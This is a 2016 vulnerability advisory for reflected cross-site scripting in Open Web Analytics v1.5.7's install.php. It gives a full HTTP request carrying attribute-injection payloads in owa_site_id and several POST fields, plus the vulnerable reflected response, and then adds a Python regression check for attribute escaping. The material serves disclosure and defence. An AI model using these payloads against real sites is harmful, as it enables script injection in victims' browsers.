Exploit Title: Open Web Analytics v1.5.7 Cross-Site Scripting
Author: 1N3 @CrowdShield https://crowdshield.com
Vendor: http://www.openwebanalytics.com/
Date: 02/24/2016
Description:
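Open Web Analytics v1.5.7 is vulnerable to reflected Cross-Site Scripting through the owa_site_id parameter of install.php. The parameter is written into the value attribute of the hidden owa_go input without output encoding, so a double quote in the parameter closes the attribute and lets the request add attributes of its own, as the response below shows. Because the field is hidden, the injected onclick handler only runs when the user presses the injected access key, ALT+SHIFT+X, after the payload is injected.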
Request:
POST /install.php?owa_site_id=1"/accesskey="X"/onclick="alert(1)"><!--%20&owa_do=base.installDefaultsEntry& HTTP/1.1
Host: web.kiwi.ki
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://web.kiwi.ki/install.php?owa_site_id=&owa_do=base.installDefaultsEntry&
Cookie: owa_v=cdh%3D%3Ea2fc6dac%7C%7C%7Cvid%3D%3E1456351264222521405%7C%7C%7Cfsts%3D%3E1456351264%7C%7C%7Cdsfs%3D%3E0%7C%7C%7Cnps%3D%3E1; owa_s=cdh%3D%3Ea2fc6dac%7C%7C%7Clast_req%3D%3E1456351264%7C%7C%7Csid%3D%3E1456351264683274933%7C%7C%7Cdsps%3D%3E0%7C%7C%7Creferer%3D%3E%28none%29%7C%7C%7Cmedium%3D%3Edirect%7C%7C%7Csource%3D%3E%28none%29%7C%7C%7Csearch_terms%3D%3E%28none%29
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 295

owa_protocol=http%3A%2F%2F&owa_domain=127%22+onmouseover%3Dprompt%28901496%29+bad%3D%22&owa_email_address=127%22+onmouseover%3Dprompt%28901496%29+bad%3D%22&owa_password=127%22+onmouseover%3Dprompt%28901496%29+bad%3D%22&owa_nonce=4076e70a50&owa_action=base.installBase&owa_save_button=Continue...
Response:
<input size="70" name="owa_go" value="https://web.kiwi.ki/install.php?owa_site_id=1" accesskey="X" onclick="alert(1)" type="hidden"><!--%20&owa_do=base.installDefaultsEntry&">
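
Added example (not part of the original advisory and not Open Web Analytics' own code): a Python regression check that renders the owa_go field with and without attribute escaping and reports any attribute the template never emits. The two render functions and their template are assumptions modelled on the response above; the reflected URL is copied from it.

```python
from html import escape
from html.parser import HTMLParser

# Reflected URL, copied from the request and response shown in the advisory.
REFLECTED_URL = ('https://web.kiwi.ki/install.php?owa_site_id=1"/accesskey="X"'
                 '/onclick="alert(1)"><!--%20&owa_do=base.installDefaultsEntry&')

# Attributes the hidden owa_go field is supposed to carry (assumed template).
EXPECTED_ATTRS = {"size", "name", "value", "type"}


def render_unescaped(url):
    """Hypothetical template that interpolates the URL as-is (the flaw)."""
    return f'<input size="70" name="owa_go" value="{url}" type="hidden">'


def render_escaped(url):
    """Same template with attribute-context escaping of & < > " and '."""
    safe = escape(url, quote=True)
    return f'<input size="70" name="owa_go" value="{safe}" type="hidden">'


class OwaGoAttrs(HTMLParser):
    """Records the attributes of the first <input name="owa_go"> start tag."""

    def __init__(self):
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        found = dict(attrs)
        if tag == "input" and self.attrs is None and found.get("name") == "owa_go":
            self.attrs = found


def owa_go_attrs(markup):
    """Parse markup and return the owa_go attributes as a dict."""
    parser = OwaGoAttrs()
    parser.feed(markup)
    parser.close()
    return parser.attrs or {}


def injected_attrs(markup):
    """Attribute names present on owa_go that the template never emits."""
    return set(owa_go_attrs(markup)) - EXPECTED_ATTRS


if __name__ == "__main__":
    print("unescaped:", sorted(injected_attrs(render_unescaped(REFLECTED_URL))))
    print("escaped:  ", sorted(injected_attrs(render_escaped(REFLECTED_URL))))
```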